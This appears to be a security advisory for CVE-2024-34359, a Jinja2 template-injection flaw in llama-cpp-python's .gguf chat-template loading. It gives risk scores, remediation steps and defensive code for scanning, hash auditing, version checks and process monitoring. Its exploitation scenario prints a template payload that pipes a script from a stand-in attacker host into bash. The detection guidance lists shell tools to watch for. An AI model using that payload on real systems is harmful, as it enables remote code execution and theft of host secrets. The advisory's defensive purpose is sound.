CVE-2024-34359 — CRITICAL (CVSS 9.6) AI Security Vulnerability

CISO Take

Any system that loads .gguf model files with an unpatched llama-cpp-python (below 0.2.72) is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded, whether via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Risk Assessment

Critical exposure for all unpatched llama-cpp-python deployments (versions below the 0.2.72 fix). CVSS 9.6 with a network attack vector and low attack complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts: loading new models is routine workflow for developers, MLOps, and researchers, so it is practically no barrier. Changed scope (S:C) combined with high confidentiality, integrity, and availability impact (C:H/I:H/A:H) means full host takeover, not just model compromise. The CVE was not listed in CISA KEV at time of publication, but model-as-attack-vector is a maturing supply chain threat with a high probability of real-world abuse.

Severity & Risk

CVSS 3.1: 9.6 / 10

EPSS: 39.4% chance of exploitation in 30 days (higher than 97% of all CVEs)

Source: EPSS v3, FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication: Moderate

Exploitation Confidence: Medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

○ EPSS exploit prediction: 39%

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

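Attack Vector (AV): Network

Attack Complexity (AC): Low

Privileges Required (PR): None

User Interaction (UI): Required

Scope (S): Changed

Confidentiality (C): High

Integrity (I): High

Availability (A): High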
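
The metrics above combine into the 9.6 base score through the CVSS v3.1 base equations. The following is a minimal sketch of that arithmetic for a Scope: Changed vector, using the metric weights published in the CVSS v3.1 specification; the function and constant names are illustrative choices, not part of any official tooling.

```python
import math

# Metric weights from the CVSS v3.1 specification (only the values this vector uses).
AV_NETWORK = 0.85   # Attack Vector: Network
AC_LOW = 0.77       # Attack Complexity: Low
PR_NONE = 0.85      # Privileges Required: None
UI_REQUIRED = 0.62  # User Interaction: Required
CIA_HIGH = 0.56     # Confidentiality / Integrity / Availability: High


def roundup(value: float) -> float:
    """Round up to one decimal place, following the CVSS v3.1 Roundup definition."""
    as_int = round(value * 100000)
    if as_int % 10000 == 0:
        return as_int / 100000.0
    return (math.floor(as_int / 10000) + 1) / 10.0


def base_score_scope_changed(av: float, ac: float, pr: float, ui: float,
                             c: float, i: float, a: float) -> float:
    """Base score for a vector with Scope: Changed (hypothetical helper name)."""
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = 8.22 * av * ac * pr * ui
    if impact <= 0:
        return 0.0
    return roundup(min(1.08 * (impact + exploitability), 10))


score = base_score_scope_changed(
    AV_NETWORK, AC_LOW, PR_NONE, UI_REQUIRED, CIA_HIGH, CIA_HIGH, CIA_HIGH
)
print(score)  # 9.6
```

The raw value before rounding is roughly 9.59, which the specification's round-up rule lifts to 9.6.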

Recommended Action

1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
2. Source control: only load .gguf files from verified, internally-mirrored model registries; treat external model files as untrusted binaries.
3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
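
The pipeline gate step could be sketched roughly as follows. This assumes the chat template has already been extracted from the .gguf metadata as a string (the extraction itself is out of scope here), and the pattern list and function name are illustrative assumptions rather than an exhaustive or authoritative ruleset. A heuristic scan like this complements the patch; it does not replace it.

```python
import re
from typing import List

# Heuristic patterns (assumptions for illustration, not a complete ruleset).
SUSPICIOUS_PATTERNS = {
    # Python object introspection such as __class__, __mro__, __subclasses__.
    "dunder attribute access": re.compile(r"__\w+__"),
    # Direct references to process-spawning helpers.
    "process or shell call": re.compile(r"\b(?:popen|subprocess|os\.system)\b"),
    # Jinja2 attr() filter, which can be used to reach attributes indirectly.
    "attr filter indirection": re.compile(r"\|\s*attr\s*\("),
}


def scan_chat_template(template: str) -> List[str]:
    """Return the labels of every suspicious pattern found in the template."""
    return [
        label
        for label, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(template)
    ]


benign = (
    "{% for message in messages %}"
    "{% if message['role'] == 'system' %}[SYS]{% endif %}"
    "{{ message['content'] }}"
    "{% endfor %}"
)
suspicious = "{{ ''.__class__ }}"

print(scan_chat_template(benign))      # []
print(scan_chat_template(suspicious))  # ['dunder attribute access']
```

A CI job could fail the build whenever the returned list is non-empty and route the model file to manual review.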

CISA SSVC Assessment

Decision: Attend

Exploitation: PoC

Automatable: No

Technical Impact: Total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Model Inference

AML.T0002.001 - Models

AML.T0010.003 - Model

AML.T0011.000 - Unsafe AI Artifacts

AML.T0018.002 - Embed Malware

AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

Article 23 - Obligations of providers of general-purpose AI models

ISO 42001

A.6.2.5 - AI system security

A.8.1 - AI supplier relationships

NIST AI RMF

GOVERN 5.2 - AI supply chain and third-party risk management

MANAGE 2.4 - Risks from AI system components and dependencies

OWASP LLM Top 10

LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2024-34359?

CVE-2024-34359 is a Jinja2 server-side template injection flaw in llama-cpp-python, the Python bindings for llama.cpp. The library reads the chat template from a .gguf file's metadata and parses it with an unsandboxed jinja2.Environment, so a crafted template can execute arbitrary code on the host. An attacker only needs to get a malicious .gguf file loaded, whether via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Is CVE-2024-34359 actively exploited?

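CVE-2024-34359 was not listed in CISA KEV at time of publication, so there is no confirmed in-the-wild exploitation. Proof-of-concept exploit code is publicly available, however, which increases the risk of exploitation.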

How to fix CVE-2024-34359?

1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
2. Source control: only load .gguf files from verified, internally-mirrored model registries; treat external model files as untrusted binaries.
3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
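
The audit step can be approximated with a short script. This sketch assumes a trusted manifest that maps file names to expected SHA256 digests, exported from whatever registry is treated as the source of truth; the manifest shape and the function names are hypothetical.

```python
import hashlib
from pathlib import Path
from typing import Dict, List


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so multi-gigabyte models do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_unverified_models(model_dir: Path, trusted: Dict[str, str]) -> List[str]:
    """Return names of .gguf files that are missing from the manifest or whose hash differs.

    `trusted` maps file name -> expected SHA256 hex digest (assumed manifest format).
    """
    unverified = []
    for path in sorted(model_dir.rglob("*.gguf")):
        if trusted.get(path.name) != sha256_of_file(path):
            unverified.append(path.name)
    return unverified
```

Any name returned by `find_unverified_models` would be a candidate for quarantine until its provenance is confirmed.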

What systems are affected by CVE-2024-34359?

This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.
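
To check whether a given environment in one of these patterns carries a vulnerable build, the installed package version can be compared against the 0.2.72 fix. The sketch below uses only the standard library; the helper names are illustrative, and the parser is deliberately simple (it reads only the leading numeric release segment, so pre-release suffixes are ignored).

```python
import re
from importlib import metadata
from typing import Optional, Tuple

PATCHED_RELEASE = (0, 2, 72)  # first fixed version according to this advisory


def parse_release(version: str) -> Tuple[int, ...]:
    """Parse the leading numeric release segment, e.g. '0.2.72' or '0.2.72.post1'."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_patched(version: str) -> bool:
    """True when the version is at or above the patched release."""
    return parse_release(version) >= PATCHED_RELEASE


def installed_version(dist_name: str = "llama-cpp-python") -> Optional[str]:
    """Return the installed version of the distribution, or None if it is absent."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_version()
    if found is None:
        print("llama-cpp-python is not installed in this environment")
    elif is_patched(found):
        print(f"llama-cpp-python {found}: at or above 0.2.72")
    else:
        print(f"llama-cpp-python {found}: below 0.2.72, upgrade required")
```

Running this inside each virtual environment or container image gives a quick inventory signal; it does not detect vendored or statically bundled copies of the library.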

What is the CVSS score for CVE-2024-34359?

CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 39.41%.

Technical Details

NVD Description

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.

Exploitation Scenario

An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation the template is read from the metadata and parsed in an unsandboxed environment; per the NVD description, it is then rendered when the chat handler constructs a prompt, at which point the payload executes. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.
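
The process behavior in this scenario (an inference worker spawning a shell or downloader) is what the detection guidance targets. As a rough sketch, the check can be expressed over a process snapshot; here the snapshot is a plain list of records, on the assumption that it comes from an EDR export, `ps` output, or a similar source. The `Proc` type, the name set, and the function are hypothetical.

```python
from typing import List, NamedTuple, Set


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str


# Process names called out in the detection guidance.
SUSPICIOUS_NAMES = {"bash", "sh", "curl", "wget"}


def flag_suspicious_children(procs: List[Proc], worker_pids: Set[int]) -> List[Proc]:
    """Return suspicious processes that descend from any inference worker PID."""
    by_pid = {proc.pid: proc for proc in procs}
    flagged = []
    for proc in procs:
        if proc.name not in SUSPICIOUS_NAMES:
            continue
        # Walk up the parent chain until a worker, the root, or a cycle is hit.
        seen = set()
        parent = proc.ppid
        while parent not in seen:
            if parent in worker_pids:
                flagged.append(proc)
                break
            if parent not in by_pid:
                break
            seen.add(parent)
            parent = by_pid[parent].ppid
    return flagged


snapshot = [
    Proc(1, 0, "init"),
    Proc(100, 1, "python"),  # inference worker
    Proc(101, 100, "sh"),    # shell spawned by the worker
    Proc(102, 101, "curl"),  # downloader spawned by that shell
    Proc(200, 1, "bash"),    # unrelated interactive shell
]
print(flag_suspicious_children(snapshot, {100}))
```

In the sample snapshot only the `sh` and `curl` processes under the worker are flagged; the unrelated `bash` session is left alone.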